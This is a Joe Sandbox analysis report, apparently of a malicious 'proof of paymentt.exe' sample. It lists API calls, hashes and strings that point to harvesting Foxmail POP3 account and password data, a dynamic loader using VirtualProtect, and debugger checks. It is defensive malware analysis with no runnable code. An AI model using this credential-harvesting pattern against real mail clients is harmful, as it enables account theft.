Uniqueness

Uniqueness Score: -1.00%

Analysis Process: proof of paymentt.exePID: 6112, Parent PID: 6500COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.6%
Total number of Nodes:	1668
Total number of Limit Nodes:	5

Executed Functions

Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
lstrcatW.KERNEL32(?,?), ref: 10001151
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
FindClose.KERNEL32(00000000), ref: 100011DB

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: lstrlen$Find$File$CloseFirstNextlstrcat
String ID:
API String ID: 1083526818-0
Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Uniqueness

Uniqueness Score: -1.00%

Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434

Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB

lstrlenW.KERNEL32(?), ref: 100014C5
lstrlenW.KERNEL32(?), ref: 100014E0
lstrlenW.KERNEL32(?,?), ref: 1000150F
lstrcatW.KERNEL32(00000000), ref: 10001521
lstrlenW.KERNEL32(?,?), ref: 10001547
lstrcatW.KERNEL32(00000000), ref: 10001553
lstrlenW.KERNEL32(?,?), ref: 10001579
lstrcatW.KERNEL32(00000000), ref: 10001585
lstrlenW.KERNEL32(?,?), ref: 100015AB
lstrcatW.KERNEL32(00000000), ref: 100015B7

Strings

Foxmail, xrefs: 1000143F, 10001453, 10001467, 1000147B, 1000148F, 100014A3, 100014F7, 10001527, 10001559, 1000158B, 100015BD
ProgramFiles, xrefs: 1000142F
), xrefs: 100014C7

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
String ID: )$Foxmail$ProgramFiles
API String ID: 672098462-2938083778
Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

Uniqueness

Uniqueness Score: -1.00%

Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

Uniqueness

Uniqueness Score: -1.00%

Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: AddressProcProtectVirtual$HandleModule
String ID:
API String ID: 2152742572-0
Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55

Uniqueness

Uniqueness Score: -1.00%

Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
ExitProcess.KERNEL32 ref: 10004AEE

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68

Uniqueness

Uniqueness Score: -1.00%

Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 10006713

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 1000724E

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00

Uniqueness

Uniqueness Score: -1.00%

Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B

_strlen.LIBCMT ref: 10001855
_strlen.LIBCMT ref: 10001869
_strlen.LIBCMT ref: 1000188B
_strlen.LIBCMT ref: 100018AE
_strlen.LIBCMT ref: 100018C8

Strings

Pass, xrefs: 100017C6
word, xrefs: 100017CD
un, xrefs: 10001787
Acco, xrefs: 100017A7
t, xrefs: 100017BF
POP3, xrefs: 100017D9
word, xrefs: 100017EA
Acco, xrefs: 1000177A
t, xrefs: 10001790
un, xrefs: 100017B6
Pass, xrefs: 100017E3
POP3, xrefs: 1000179D

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _strlen$File$CopyCreateDelete
String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
API String ID: 3296212668-3023110444
Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

Uniqueness

Uniqueness Score: -1.00%

Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 10001A2D
_strlen.LIBCMT ref: 10001A59
_strlen.LIBCMT ref: 10001A77
_strlen.LIBCMT ref: 10001AC0
_strlen.LIBCMT ref: 10001AD3
_strlen.LIBCMT ref: 10001AE0
_strlen.LIBCMT ref: 10001B24
_strlen.LIBCMT ref: 10001B44
_strlen.LIBCMT ref: 10001B67
_strlen.LIBCMT ref: 10001C14
_strlen.LIBCMT ref: 10001C37

Strings

Gon~, xrefs: 10001A07
%m$~, xrefs: 10001A1D
~dra, xrefs: 100019FD
~F@7, xrefs: 10001A16

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _strlen
String ID: %m$~$Gon~$~F@7$~dra
API String ID: 4218353326-230879103
Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 10007D06

Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF

_free.LIBCMT ref: 10007CFB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10007D1D
_free.LIBCMT ref: 10007D32
_free.LIBCMT ref: 10007D3D
_free.LIBCMT ref: 10007D5F
_free.LIBCMT ref: 10007D72
_free.LIBCMT ref: 10007D80
_free.LIBCMT ref: 10007D8B
_free.LIBCMT ref: 10007DC3
_free.LIBCMT ref: 10007DCA
_free.LIBCMT ref: 10007DE7
_free.LIBCMT ref: 10007DFF

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

Uniqueness

Uniqueness Score: -1.00%

Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 100059EA

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100059F6
_free.LIBCMT ref: 10005A01
_free.LIBCMT ref: 10005A0C
_free.LIBCMT ref: 10005A17
_free.LIBCMT ref: 10005A22
_free.LIBCMT ref: 10005A2D
_free.LIBCMT ref: 10005A38
_free.LIBCMT ref: 10005A43
_free.LIBCMT ref: 10005A51

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

Uniqueness

Uniqueness Score: -1.00%

Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: File$Delete$CloseCopyCreateHandleReadSize
String ID:
API String ID: 1454806937-0
Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

Uniqueness

Uniqueness Score: -1.00%

Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
__fassign.LIBCMT ref: 1000954F
__fassign.LIBCMT ref: 1000956A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 1000339B
___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
_ValidateLocalCookies.LIBCMT ref: 10003431
__IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
_ValidateLocalCookies.LIBCMT ref: 100034B1

Strings

csm, xrefs: 10003446

Memory Dump Source

Source File: 00000007.00000002.4460079845.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.4460047209.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.4460079845.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_proof of paymentt.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10009221: _free.LIBCMT ref: 1000924A

_free.LIBCMT ref: 100092AB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100092B6
_free.LIBCMT ref: 100092C1
_free.LIBCMT ref: 10009315
_free.LIBCMT ref: 10009320
_free.LIBCMT ref: 1000932B
_free.LIBCMT ref: 10009336

Memory Dump Source

